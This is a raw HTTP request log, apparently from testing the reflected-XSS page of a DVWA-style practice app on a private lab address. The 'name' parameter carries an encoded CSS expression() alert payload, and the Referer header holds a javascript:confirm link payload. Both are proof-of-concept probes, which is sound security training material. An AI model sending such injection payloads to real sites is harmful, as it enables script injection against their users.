GET /vulnerabilities/xss_r/?name=%3Cdiv+style%3D%22color%3A+expression%28alert%28%27XSS%27%29%29%22%3E HTTP/1.1
Host: 10.10.3.128
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128/vulnerabilities/xss_r/?name=%3Ca+href%3D%22javascript%3Aconfirm%281%29%22%3Elink%3C%2Fa%3E
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

